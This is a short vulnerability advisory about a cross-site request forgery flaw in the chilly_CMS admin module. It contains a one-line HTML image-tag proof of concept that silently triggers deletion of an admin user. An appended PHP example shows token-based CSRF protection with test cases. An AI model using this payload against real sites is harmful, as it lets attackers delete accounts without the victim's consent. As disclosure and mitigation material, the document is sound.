=======================================================================
chilly_CMS CSRF Vulnerability
=======================================================================

# Vulnerability found in- Admin module
# email Pratulag@yahoo.com
# company aksitservices
# Credit by Pratul Agrawal
# Software chilly_CMS
# Category CMS / Portals
# Platform php
# Greetz to Gaurav, Prateek, Vivek, Sanjay, Sourabh, Varun (My Web Team)

# Proof of concept #
Script to Delete the Admin user through Cross Site request forgery
.................................................................................................................
<html><body><img src=http://server/chillycms/admin/usersgroups.site.php?action=deleteuser&id=[user ID]/></body></html>
.................................................................................................................
After execution, refresh the page and you can see that the added content is deleted automatically.

# If you have any questions, comments, or concerns, feel free to contact me.
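
Mitigation sketch, added here as an example (it is not part of the original advisory and is not chilly_CMS code): the request above succeeds because a state-changing admin action is accepted over GET with no per-session token. The function names csrf_token() and csrf_check() and the sample requests are hypothetical and constructed for illustration.

```php
<?php
// Added example: hypothetical hardened check, not chilly_CMS source.
declare(strict_types=1);

// Issue one random token per session; the admin UI embeds it as a
// hidden field in every form that changes state.
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Accept a state-changing request only if it is a POST that carries
// the token bound to this session.
function csrf_check(string $method, array $post, array $session): bool
{
    if ($method !== 'POST') {
        return false; // tag-triggered GET requests stop here
    }
    $sent  = $post['csrf_token'] ?? '';
    $known = $session['csrf_token'] ?? '';
    // hash_equals() compares in constant time.
    return is_string($sent) && is_string($known) && $known !== ''
        && hash_equals($known, $sent);
}

// Constructed requests. In a real handler these values would come from
// $_SERVER['REQUEST_METHOD'], $_POST and $_SESSION.
$session = [];
$token   = csrf_token($session);
$delete  = ['action' => 'deleteuser', 'id' => '2'];

$cases = [
    'cross-site GET'            => ['GET',  []],
    'cross-site POST, no token' => ['POST', $delete],
    'cross-site POST, wrong token' =>
        ['POST', $delete + ['csrf_token' => str_repeat('0', 64)]],
    'same-site form POST'       => ['POST', $delete + ['csrf_token' => $token]],
];

foreach ($cases as $label => [$method, $post]) {
    $ok = csrf_check($method, $post, $session);
    printf("%-30s %s\n", $label, $ok ? 'allowed' : 'rejected');
}
```

Only the last case is allowed. Setting the session cookie's SameSite attribute (for example through session_set_cookie_params() on PHP 7.3 or later) adds a second layer on top of the token check.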